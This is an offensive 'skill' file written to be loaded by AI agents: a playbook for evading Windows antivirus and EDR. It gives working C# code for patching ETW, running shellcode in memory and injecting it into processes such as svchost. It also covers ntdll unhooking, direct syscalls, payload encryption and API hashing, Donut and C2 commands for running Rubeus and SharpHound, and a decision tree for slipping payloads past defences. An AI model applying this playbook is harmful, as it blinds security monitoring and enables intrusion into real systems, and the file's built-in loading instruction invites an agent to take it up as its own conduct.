SKILL: AV/EDR Evasion — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert AV/EDR evasion techniques for Windows. Covers AMSI bypass, ETW bypass, .NET assembly loading, shellcode execution, process injection, unhooking, payload encryption, and signature evasion. Base models miss detection-specific bypass chains and syscall-level evasion nuances.

0. RELATED ROUTING

Before going deep, consider loading:

windows-privilege-escalation when privesc tools are blocked by AV
windows-lateral-movement when lateral movement tools trigger EDR
active-directory-kerberos-attacks when Rubeus/Mimikatz are detected
active-directory-acl-abuse for non-binary AD attacks (less AV-sensitive)

Advanced Reference

Also load AMSI_BYPASS_TECHNIQUES.md when you need:

Detailed AMSI bypass code patterns (memory patching, reflection)
PowerShell-specific AMSI bypasses
.NET AMSI bypass techniques

1. AMSI BYPASS OVERVIEW

AMSI (Antimalware Scan Interface) inspects PowerShell, .NET, VBScript, JScript, and Office macros at runtime.

Key AMSI Bypass Categories

Category	Method	Detection Risk	Persistence
Memory patching	Patch `AmsiScanBuffer` in `amsi.dll`	Medium	Per-process
Reflection	Modify AMSI init flags via .NET reflection	Medium	Per-session
String obfuscation	Encode/split AMSI trigger strings	Low	Per-payload
PowerShell downgrade	Force PS v2 (no AMSI)	Low	Per-session
CLM bypass	Escape Constrained Language Mode	Medium	Per-session
COM hijack	Redirect AMSI COM server	Low	Per-user

Quick AMSI Bypass (One-Liners)

# PowerShell v2 downgrade (if .NET 2.0 available — no AMSI in v2)
powershell -Version 2

# Reflection-based (set amsiInitFailed = true)
# Obfuscated to avoid static detection — see AMSI_BYPASS_TECHNIQUES.md for full patterns

2. ETW BYPASS

ETW (Event Tracing for Windows) feeds telemetry to EDR. Patching EtwEventWrite stops .NET assembly load events.

Patch EtwEventWrite

// C# — patch EtwEventWrite to return immediately
var ntdll = GetModuleHandle("ntdll.dll");
var etwAddr = GetProcAddress(ntdll, "EtwEventWrite");
// Write: ret (0xC3) to first byte
VirtualProtect(etwAddr, 1, 0x40, out uint oldProtect);
Marshal.WriteByte(etwAddr, 0xC3);
VirtualProtect(etwAddr, 1, oldProtect, out _);

PowerShell ETW Bypass

# Disable Script Block Logging (ETW provider)
[Reflection.Assembly]::LoadWithPartialName('System.Management.Automation')
# Set internal field to disable ETW tracing

3. .NET ASSEMBLY LOADING

In-Memory Assembly.Load

byte[] assemblyBytes = File.ReadAllBytes("tool.exe");
// Or download from URL, decrypt from resource
Assembly assembly = Assembly.Load(assemblyBytes);
assembly.EntryPoint.Invoke(null, new object[] { args });

Donut — Convert .NET Assembly to Shellcode

# Generate shellcode from .NET EXE
donut -f tool.exe -o payload.bin -a 2 -c ToolNamespace.Program -m Main

# With parameters
donut -f Rubeus.exe -o rubeus.bin -a 2 -p "kerberoast /outfile:tgs.txt"

# Then load shellcode via any injection technique (§5)

execute-assembly (C2 Framework)

# Cobalt Strike
execute-assembly /path/to/Rubeus.exe kerberoast

# Sliver
execute-assembly /path/to/SharpHound.exe -c all

# Havoc
dotnet inline-execute /path/to/tool.exe args

4. SHELLCODE EXECUTION TECHNIQUES

VirtualAlloc + Callback (Avoids CreateThread)

IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)sc.Length, 0x3000, 0x40);
Marshal.Copy(sc, 0, addr, sc.Length);
// Use callback API instead of CreateThread (less monitored)
EnumWindows(addr, IntPtr.Zero);

Callback APIs for shellcode execution: EnumWindows, EnumChildWindows, EnumFonts, EnumDesktops, CertEnumSystemStore, EnumDateFormats — all accept function pointers that can point to shellcode.

5. PROCESS INJECTION TECHNIQUES

Technique	APIs Used	Detection Risk	Notes
CreateRemoteThread	OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread	High	Classic, heavily monitored
NtMapViewOfSection	NtCreateSection, NtMapViewOfSection	Medium	Shared memory, less common
Process Hollowing	CreateProcess (SUSPENDED), NtUnmapViewOfSection, WriteProcessMemory, ResumeThread	Medium	Replace process image
Thread Hijacking	SuspendThread, SetThreadContext, ResumeThread	Medium	Modify existing thread
Early Bird	CreateProcess (SUSPENDED), QueueUserAPC, ResumeThread	Low-Medium	APC before main thread
Phantom DLL Hollowing	Map DLL section, overwrite with shellcode	Low	Uses legitimate DLL mapping
Module Stomping	LoadLibrary, overwrite .text section	Low	Backed by legitimate DLL
Transacted Hollowing	NtCreateTransaction, NtCreateSection	Low	No suspicious allocations

CreateRemoteThread (Basic Pattern)

IntPtr hProcess = OpenProcess(0x001F0FFF, false, targetPid);
IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)sc.Length, 0x3000, 0x40);
WriteProcessMemory(hProcess, addr, sc, (uint)sc.Length, out _);
CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);

Early Bird APC Injection

// Create suspended process
STARTUPINFO si = new STARTUPINFO();
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
CreateProcess(null, "C:\\Windows\\System32\\svchost.exe", ..., CREATE_SUSPENDED, ..., ref si, ref pi);

// Allocate and write shellcode
IntPtr addr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, (uint)sc.Length, 0x3000, 0x40);
WriteProcessMemory(pi.hProcess, addr, sc, (uint)sc.Length, out _);

// Queue APC to main thread (runs before main entry point)
QueueUserAPC(addr, pi.hThread, IntPtr.Zero);
ResumeThread(pi.hThread);

6. UNHOOKING — BYPASS EDR API HOOKS

Direct Syscalls (SysWhispers / HellsGate)

EDR hooks ntdll.dll functions. Direct syscalls bypass hooks by invoking the kernel directly.

Normal: User code → ntdll.dll (HOOKED) → kernel
Direct: User code → syscall instruction → kernel (bypasses hook)

Tool	Method	Notes
SysWhispers2/3	Compile-time syscall stubs	Static syscall numbers
HellsGate	Runtime syscall number resolution	Dynamic, harder to detect
HalosGate	Resolve from neighboring unhooked syscalls	Handles partial hooks
TartarusGate	Extended HalosGate	More robust resolution

Fresh ntdll Copy

// Read clean ntdll.dll from disk
byte[] cleanNtdll = File.ReadAllBytes(@"C:\Windows\System32\ntdll.dll");
// Or from KnownDlls: \KnownDlls\ntdll.dll
// Or from suspended process (create sacrificial process, read its ntdll)

// Overwrite hooked .text section with clean copy
// → All EDR hooks in ntdll are removed

Indirect Syscalls

// Instead of: syscall (in your code — suspicious)
// Do: jump to syscall instruction inside ntdll.dll (legitimate location)
// The ret address on stack points to ntdll.dll, not your code

7. PAYLOAD ENCRYPTION & OBFUSCATION

Encryption Methods

// AES encryption (preferred)
using Aes aes = Aes.Create();
aes.Key = key; aes.IV = iv;
byte[] encrypted = aes.CreateEncryptor().TransformFinalBlock(shellcode, 0, shellcode.Length);

// XOR (simple, fast)
for (int i = 0; i < shellcode.Length; i++)
    shellcode[i] ^= key[i % key.Length];

// RC4 (stream cipher, simple implementation)

Sleep Obfuscation

Encrypt shellcode in memory during sleep to avoid memory scanners.

Technique	Method
Ekko	ROP chain → encrypt heap/stack during sleep
Foliage	APC-based sleep with memory encryption
DeathSleep	Thread de-registration during sleep

Staged Loading

Stage 1: Small, encrypted loader (evades static analysis)
Stage 2: Download actual payload at runtime (encrypted)
Stage 3: Decrypt in memory → execute

8. SIGNATURE EVASION

String Encryption

// Avoid plaintext API names, URLs, tool names
// Use encrypted strings, decrypt at runtime
string decrypted = Decrypt(encryptedApiName);
IntPtr funcPtr = GetProcAddress(GetModuleHandle("kernel32.dll"), decrypted);

API Hashing

// Resolve API by hash instead of name (avoids string detection)
// Hash "VirtualAlloc" → 0x91AFCA54
IntPtr func = GetProcAddressByHash(module, 0x91AFCA54);

Metadata Removal

# Strip .NET metadata
ConfuserEx / .NET Reactor / Obfuscar

# Remove PE metadata (timestamps, rich header, debug info)
# Modify compilation timestamps
# Strip PDB paths

C2 Framework Evasion

Framework	Key Evasion Features
Cobalt Strike	Malleable C2 profiles, HTTP/S traffic shaping, sleep jitter, PE evasion
Sliver	Multiple protocols (mTLS, WireGuard, DNS), stager-less, built-in obfuscation
Havoc	Indirect syscalls, sleep obfuscation, module stomping
Brute Ratel	Badger agent, syscall evasion, ETW/AMSI bypass built-in

9. AV/EDR EVASION DECISION TREE

Need to execute tool/payload on protected host
│
├── PowerShell-based payload?
│   ├── AMSI blocking? → AMSI bypass first (§1)
│   │   ├── .NET 2.0 available? → PS v2 downgrade (no AMSI)
│   │   ├── Memory patch AmsiScanBuffer
│   │   └── Reflection-based bypass
│   ├── Script Block Logging? → ETW bypass (§2)
│   └── Constrained Language Mode? → CLM bypass or switch to C#
│
├── .NET assembly (Rubeus, SharpHound, etc.)?
│   ├── Direct execution blocked?
│   │   ├── In-memory Assembly.Load (§3)
│   │   ├── Convert to shellcode with Donut (§3)
│   │   └── Use C2 execute-assembly (§3)
│   └── Still detected?
│       ├── Obfuscate assembly (ConfuserEx)
│       ├── Modify source + recompile
│       └── Use BOFs (Beacon Object Files) if CS
│
├── Shellcode execution needed?
│   ├── Basic → VirtualAlloc + callback (§4)
│   ├── Need injection → choose technique by OPSEC (§5)
│   │   ├── Low detection needed → module stomping or phantom DLL
│   │   ├── Medium → early bird APC or NtMapViewOfSection
│   │   └── Quick and dirty → CreateRemoteThread
│   └── Memory scanners detect payload?
│       ├── Encrypt payload → decrypt only at execution (§7)
│       └── Sleep obfuscation (Ekko/Foliage) (§7)
│
├── EDR hooking ntdll.dll?
│   ├── Direct syscalls (SysWhispers3/HellsGate) (§6)
│   ├── Fresh ntdll copy from disk/KnownDlls (§6)
│   └── Indirect syscalls (return to ntdll instruction) (§6)
│
├── Signature detection?
│   ├── Known tool signature → modify + recompile
│   ├── String-based → string encryption / API hashing (§8)
│   ├── PE metadata → strip/modify (§8)
│   └── Behavioral → change execution flow, add junk code
│
└── All local evasion fails?
    ├── Use Living-off-the-Land (LOLBins): certutil, mshta, regsvr32
    ├── Use legitimate admin tools (PsExec, WMI, WinRM)
    └── Switch to fileless / memory-only techniques

windows-av-evasion